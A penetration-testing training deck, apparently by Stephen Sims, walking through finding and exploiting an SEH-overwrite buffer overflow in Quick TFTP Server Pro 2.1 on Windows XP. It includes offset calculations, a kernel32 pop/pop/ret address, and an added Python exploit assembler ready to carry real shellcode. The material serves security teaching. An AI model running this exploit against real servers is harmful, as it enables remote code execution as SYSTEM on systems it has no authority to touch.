Custom Penetration Testing
Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims
Objectives
• Penetration Testing
• Precompiled Tools
• Targeting
• TFTP
– Testing a TFTP Server for Bugs
– Discovering the Bug
– Exploiting the TFTP Server
• Advanced Concepts
What is Penetration Testing?
• Process of testing a target environment for weaknesses
– More thorough than vulnerability scanning alone
– Validates findings by exploiting flaws
– Allows you to think like an attacker
– Various levels of interaction/depth
Types of Penetration Testing
• Black-Box Penetration Testing
– No access to source code
– No access provided to OS, architecture, etc…
– More like an outsider attack scenario
– More time consuming
• Crystal-Box Penetration Testing
– Tester given source code, system & network architecture and/or privileged system access
– More thorough than black-box testing
– Cost effective
Precompiled Tools
• Pros
– Can quickly be used
– Customer support
– Broad user community
– Often allow custom scripts or modules
• Cons
– Limited in scope
– Only discover and test known vulnerabilities
– Skilled attackers are not relying solely on them
– Precompiled tools can breed complacency
Targeting
• General Steps
1. Determine Target Application and Operating System
2. Obtain a Copy of the Application
3. Analyze RFC and Communications Protocols
4. Discover and Record a Crash Condition
5. Analyze Crash Condition for Exploitation Opportunities
1) Determine Target Application and Operating System
• What application/service are you analyzing?
– Which OSes is it available for?
• Which one(s) are you interested in?
– What services does the application start up?
• There may be several
• Scanning may help
• Analyze documentation and code if possible
– Are the services proprietary or standards-based?
2) Obtain a Copy of the Application
• Create a lab environment and install the application
– Use the OS you are targeting
– Utilize virtual machines
• Create snapshots prior to installation
• Install monitoring tools
– Attempt to obtain the source code
• Code analysis is often more complex than behavioral analysis, but valuable
3) Analyze RFC and Communications Protocols
• Is documentation available?
– Programmers should follow RFCs
• Search the RFC for options and fields that may give an opportunity to cause a fault
• Understand each aspect of the protocols used by the application and the related behavior
– Is architectural documentation available?
4) Discover and Record a Crash Condition
• Are you properly monitoring?
– Sniffers to record packets sent to the application
• Wireshark/Tshark, tcpdump, etc…
• Packets can be recorded and replayed
– Debuggers to record application behavior while receiving/handling data
• OllyDbg, Immunity Debugger, WinDbg
– OS monitoring tools to monitor health
• ProcMon, RegMon, FileMon, RegShot, etc…
– The condition must be repeatable
5) Analyze Crash Condition for Exploitation Opportunities
• What is happening during the crash?
– Analyze the status of each register
• Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A's
– Is the Return Pointer or SEH chain being overwritten?
• Analyze the stack segment and monitor ESP/EBP
– Are heap pointers being overwritten?
• Analyze dynamic memory allocations and behavior
– There’s way more to analyze, but this is a start!
Targeting (2)
• Our goal is to discover and exploit a Windows program vulnerability!
• The techniques we'll cover are applicable to any target or service
• We're targeting a TFTP service
– Must understand how the protocol works
– Developers should follow RFCs
• We can leverage the RFC as well
– Could use fuzzing to automate bug discovery
Our TFTP Target
• Quick TFTP Server Pro Version 2.1
– Vulnerable to a stack-based buffer overflow
• Can exploit by overwriting the Structured Exception Handling (SEH) chain
• Allows for DoS or code execution as SYSTEM
– TFTP server published by TallSoft
– Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security
TFTP
• Trivial File Transfer Protocol (TFTP)
– Simple protocol for transferring files over a network
– Clear-text protocol using UDP port 69
– Used for transferring files by network devices, VoIP phones and other client-server programs
TFTP Behavior
• The connection request is combined with either a read or write request
• Blocks of data are sent in a fixed size of 512 bytes by default
– Each block must be acknowledged for error control
• A block shorter than 512 bytes indicates the end of the stream
TFTP Behavior (2)
• The first two bytes of a TFTP packet (the opcode) indicate the packet type and format
– \x00\x01 indicates a read request (RRQ)
– \x00\x02 indicates a write request (WRQ)
– \x00\x03 indicates a data block
– \x00\x04 is an acknowledgement
– \x00\x05 indicates an error
– \x00\x06 is an option acknowledgement (OACK, RFC 2347)
TFTP Behavior (3)
• Read and Write request format:
– \x00\x01 for read | \x00\x02 for write
– File Name
– Null byte - \x00
– Mode – netascii (ASCII), octet (binary) or mail
– Null byte - \x00
• Example
  Request   Type       File Name   Null   Mode    Null
  Read      \x00\x01   file1.txt   \x00   octet   \x00
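A builder and decoder for the packet formats above, as an added example that is not part of the original slides. The layouts follow RFC 1350 (opcodes 1 to 5) and RFC 2347 (OACK); the function names (build_request, parse, and so on) and the sample packets are mine and constructed inline so the script runs offline. The decoder reports oversized filename and mode fields rather than rejecting them, because those lengths are exactly what you want to see when reading a crash capture.

```python
"""Build and decode TFTP packets (RFC 1350 opcodes 1-5, OACK from RFC 2347).

Added example for this page; it is not code from the original slides.
All sample packets are constructed inline so this runs offline.
"""
import struct

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR", 6: "OACK"}
MODES = (b"netascii", b"octet", b"mail")
BLOCK_SIZE = 512   # default data block size; a shorter block ends the transfer


def _b(s):
    """Accept str or bytes for convenience."""
    return s.encode("ascii") if isinstance(s, str) else s


def build_request(opcode, filename, mode=b"octet"):
    """RRQ (1) / WRQ (2): opcode | filename | NUL | mode | NUL.
    The mode is deliberately not validated: a fuzzer wants to send junk here."""
    if opcode not in (1, 2):
        raise ValueError("request opcode must be 1 (RRQ) or 2 (WRQ)")
    return struct.pack("!H", opcode) + _b(filename) + b"\x00" + _b(mode) + b"\x00"


def build_data(block, payload):
    return struct.pack("!HH", 3, block) + payload


def build_ack(block):
    return struct.pack("!HH", 4, block)


def build_error(code, message):
    return struct.pack("!HH", 5, code) + _b(message) + b"\x00"


def build_oack(options):
    """options: list of (name, value) pairs, each NUL-terminated on the wire."""
    body = b"".join(_b(k) + b"\x00" + _b(v) + b"\x00" for k, v in options)
    return struct.pack("!H", 6) + body


def _cstrings(buf):
    """Split NUL-terminated string fields. A missing terminator is rejected here;
    a server that just strcpy()s these fields is the bug class hunted below."""
    fields = []
    while buf:
        end = buf.find(b"\x00")
        if end < 0:
            raise ValueError("unterminated string field")
        fields.append(buf[:end])
        buf = buf[end + 1:]
    return fields


def parse(pkt):
    """Decode one TFTP packet into a dict, the way you would read it off a capture."""
    if len(pkt) < 2:
        raise ValueError("packet shorter than the 2-byte opcode")
    (op,) = struct.unpack("!H", pkt[:2])
    kind = OPCODES.get(op)
    if kind is None:
        raise ValueError("unknown opcode %d" % op)
    body = pkt[2:]
    if kind in ("RRQ", "WRQ"):
        fields = _cstrings(body)
        if len(fields) < 2:
            raise ValueError("request needs a filename and a mode")
        filename, mode = fields[0], fields[1]
        # Oversized fields are reported, not rejected: that is what you look for.
        return {"op": kind, "filename": filename, "mode": mode,
                "known_mode": mode.lower() in MODES,
                "filename_len": len(filename), "mode_len": len(mode),
                "options": dict(zip(fields[2::2], fields[3::2]))}
    if kind == "OACK":
        fields = _cstrings(body)
        return {"op": kind, "options": dict(zip(fields[0::2], fields[1::2]))}
    if len(body) < 2:
        raise ValueError("%s packet is missing its 2-byte field" % kind)
    (num,) = struct.unpack("!H", body[:2])
    if kind == "DATA":
        data = body[2:]
        return {"op": kind, "block": num, "data": data, "last": len(data) < BLOCK_SIZE}
    if kind == "ACK":
        return {"op": kind, "block": num}
    msgs = _cstrings(body[2:])                      # ERROR: code | message | NUL
    return {"op": kind, "code": num, "message": msgs[0] if msgs else b""}
```

parse() on a read request carrying 1060 bytes of A's in the mode field comes back with mode_len 1060 and known_mode False, which is the one-line summary you want next to the debugger's crash.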
Hacking Quick TFTP Server
• Quick TFTP Server Version 2.1
– Install tftpserver_setup.exe onto a Windows XP virtual machine
– Use the TFTP information just covered to help with the investigation
– Attempt to crash the TFTP server while running in a debugger
– Create a custom script to start the testing
– Validate findings
– Attempt code execution
Tools We Need
• Programming/Scripting Language
– Python, Perl, Ruby, C
• Debugger and Disassembler
– OllyDbg, Immunity Debugger, IDAPro
• Shellcode
– Metasploit, Milw0rm, Custom
• An open mind!
– Knowledge of OS controls, Opcodes, Tricks…
Python
• Object-oriented, High-level Programming Language
• Very Intuitive
• Very Modular
• No Manual Compilation
• Plays well with other languages
– C, C++, Jython, IronPython (.NET)
• Good Debugging
Tool: OllyDbg
• Software debugger for Windows
– Author: Oleh Yuschuk
• Shareware!
• Binary code analysis
• Register contents, procedures, API calls, patching, memory searching and more!
Hacking TFTP Hint #1
• Consider the format of TFTP requests for your script
– We covered the order a few slides ago
– Read & Write requests are often the easiest to attack as they have variable-length fields
• They start with \x00\x01 & \x00\x02
– The header format must be correct to trigger a valid response
– Command-line scripting is not always the best option
• You may want to write a script
Hacking TFTP Hint #2
• Where could a buffer overflow condition exist?
– Try the request type field, file name and/or the mode
– Don’t forget the nulls to terminate!
– Make sure you’re watching the right thread in OllyDbg
• Processes have multiple threads on Windows
Hacking TFTP Hint #3
• The easiest way is to use Python or Perl to open a socket and send your packet
import socket

target = "IP ADDRESS"   # Enter the right IP here
port = 69               # Port for TFTP

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # TFTP runs over UDP
cmd = b"A" * 10            # Enter the number of A's to send (bytes literal: works on Python 2 and 3)
data = b"\x00\x01" + cmd   # Modify this line to format your packet (opcode, file name, null, mode, null)
s.sendto(data, (target, port))
Quick TFTP Walk-Through
• Start Quick TFTP Server with Olly
• Ignore entry point messages
• Press F9 once loaded
• Click "OK" on the demo pop-up
Quick TFTP Walk-Through (2)
• This may be possible via command line, but…
– We need a script!
– Don't forget the formatting of TFTP read and write requests:
– The overflow is in the mode section!
  Request   Type       File Name   Null   Mode    Null
  Read      \x00\x01   file1.txt   \x00   octet   \x00
Quick TFTP Walk-Through (3)
• Write a Python script that sends a read request to the TFTP server with 1000 A's in the mode field
• No crash in Olly…
Quick TFTP Walk-Through (4)
• 1060 A's: EIP is 0x41414141
• Success!
Quick TFTP Walk-Through (5)
• What are we overwriting?
• Let's do some math to see where the overflow is occurring
• We overwrote the SEH chain!
Quick TFTP Walk-Through (6)
• Subtracting 41 A's from the 1060 takes us to the start of the SEH record: the next-SEH pointer sits at offset 1019 and the handler pointer 4 bytes later at offset 1023
• Let's give it a try by setting:
cmd = b"A"*1023 + b"\xde\xc0\xad\xde"
• The handler pointer now reads 0xdeadc0de (written little-endian): we control EIP at 1023 bytes!
Quick TFTP Walk-Through (7)
• We now need to find a valid pop/pop/ret instruction
– Use the findjmp tool and experiment
– 0x77ec9cac is one I chose from kernel32.dll for XP SP1
– Remember that you must compensate for SafeSEH if hacking XP SP2/SP3: the handler address has to come from a module that was not built with SafeSEH, or the dispatcher will refuse to call it
– Also remember that not every pop/pop/ret address will work. You gotta dig…
Quick TFTP Walk-Through (8)
• Finalizing our script…
# sc holds your shellcode (Metasploit, milw0rm or custom); it must not contain a null byte
cmd = b"A"*1019 + b"\xeb\x06\x90\x90" + b"\xac\x9c\xec\x77" + b"\x90"*4 + sc
data = b"\x00\x01" + b"blah" + b"\x00" + cmd + b"\x00"
– Our jmp and pointer: "\xeb\x06\x90\x90" overwrites the next-SEH pointer with a short jump 6 bytes forward (over the two padding NOPs and the 4-byte handler address), and "\xac\x9c\xec\x77" is 0x77ec9cac written little-endian…
– Our NOPs and shellcode: "\x90"*4 + sc is where the jump lands…
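The whole procedure from the hints through the final script, assembled into one added example that is not the slides' own code: it builds the read request with the SEH overwrite riding in the mode field, checks the offsets the walk-through arrived at (next-SEH at 1019, handler at 1023, the short jump landing in the NOP sled at 1027) and refuses a pointer or shellcode containing a null, since the mode field is a NUL-terminated string and the copy would stop there. The address 0x77ec9cac is the XP SP1 kernel32.dll pop/pop/ret from the slides; the INT3 stand-in shellcode, the helper names, the bad-byte check and the placeholder lab address 192.0.2.10 are my assumptions.

```python
"""Assemble the SEH-overwrite read request from the walk-through.

Added example for this page, not the slides' own script. The layout
(1019 bytes of filler, 4-byte next-SEH, 4-byte handler, NOPs, shellcode)
and the XP SP1 kernel32.dll pop/pop/ret address come from the slides;
the INT3 stand-in shellcode, the bad-byte check and the helper names are
additions, and the target IP is a placeholder.
"""
import socket
import struct

NSEH_OFFSET = 1019            # bytes of filler before the next-SEH pointer
HANDLER_OFFSET = NSEH_OFFSET + 4
POP_POP_RET = 0x77ec9cac      # kernel32.dll on XP SP1, per the walk-through
BAD_BYTES = b"\x00"           # mode is NUL-terminated: a 0x00 ends the copy early
SHELLCODE = b"\xcc" * 8       # stand-in: INT3s so the debugger breaks when control arrives


def short_jmp(distance):
    """Encode a 2-byte short jump (EB rel8); rel8 is relative to the end of the jmp."""
    if not -128 <= distance <= 127:
        raise ValueError("short jump out of rel8 range")
    return b"\xeb" + struct.pack("b", distance)


def check_bad_bytes(blob, bad=BAD_BYTES, what="payload"):
    """Refuse pointers or shellcode containing a byte the server stops copying at."""
    for i in range(len(bad)):
        if bad[i:i + 1] in blob:
            raise ValueError("%s contains bad byte %r" % (what, bad[i:i + 1]))


def build_seh_payload(shellcode=SHELLCODE, handler=POP_POP_RET,
                      nseh_offset=NSEH_OFFSET, nop_count=4):
    """filler | nSEH | handler | NOP sled | shellcode.

    pop/pop/ret returns into nSEH, where 'jmp short +6' skips its own two
    padding bytes plus the 4-byte handler address and lands in the NOP sled."""
    handler_bytes = struct.pack("<I", handler)      # x86 pointers are little-endian
    check_bad_bytes(handler_bytes, what="handler address")
    check_bad_bytes(shellcode, what="shellcode")
    nseh = short_jmp(6) + b"\x90\x90"
    return (b"A" * nseh_offset + nseh + handler_bytes
            + b"\x90" * nop_count + shellcode)


def jump_target(payload, nseh_offset=NSEH_OFFSET):
    """Offset the short jump stored in nSEH lands on: end of the jmp plus rel8."""
    if payload[nseh_offset:nseh_offset + 1] != b"\xeb":
        raise ValueError("nSEH does not start with a short jump")
    (rel8,) = struct.unpack("b", payload[nseh_offset + 1:nseh_offset + 2])
    return nseh_offset + 2 + rel8


def build_request(filename, mode):
    """RRQ: opcode 0x0001 | filename | NUL | mode | NUL (the overflow rides in mode)."""
    return b"\x00\x01" + filename + b"\x00" + mode + b"\x00"


def build_exploit(**kw):
    return build_request(b"blah", build_seh_payload(**kw))


def send(target, data, port=69, timeout=3.0):
    """Fire the datagram; a server that died on the overwrite answers nothing."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(data, (target, port))
        return s.recvfrom(4096)[0]
    except socket.timeout:
        return None
    finally:
        s.close()


if __name__ == "__main__":
    pkt = build_exploit()
    print("%d bytes, nSEH at %d, handler at %d, jmp lands at %d" % (
        len(pkt), NSEH_OFFSET, HANDLER_OFFSET, jump_target(build_seh_payload())))
    # send("192.0.2.10", pkt)   # placeholder lab address (TEST-NET-1); point it at your XP VM
```

Swap SHELLCODE for real shellcode once the INT3 fires in Olly; the bad-byte check will tell you before you send it if the encoder left a null in it. jump_target() is the arithmetic to re-run whenever you change the padding or the handler position, so the jump still lands in the sled rather than in the middle of the pointer.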
Advanced Concepts
• Depending on the OS version, a number of controls have been added
– SafeSEH
• Checks an exception handler address against the module's registered handler table before calling it, so an overwritten pointer into a SafeSEH module is never dispatched
– ASLR
• Randomizes the locations of libraries and memory segments
– DEP
• Prevents code execution on the stack and heap
– Security Cookies
• Unique values placed on the stack at function entry and in heap chunk headers at allocation, which are checked on function return or free
• Every byte in memory is a potential full or partial opcode
More Information
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
• Preventing the Exploitation of SEH Overwrites by Skape (Matt Miller)
http://www.uninformed.org/?v=5&a=2&t=pdf
• SEH Overwrites Simplified v1.01 by Aelphaeis Mangarae
http://www.milw0rm.com/papers/187
• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov
http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
• Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz
http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
• Third Generation Exploitation by Halvar Flake
www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
• Heap Feng Shui in JavaScript by Alexander Sotirov
http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
• Understanding Windows Shellcode by Skape
http://www.hick.org/code/skape/papers/win32-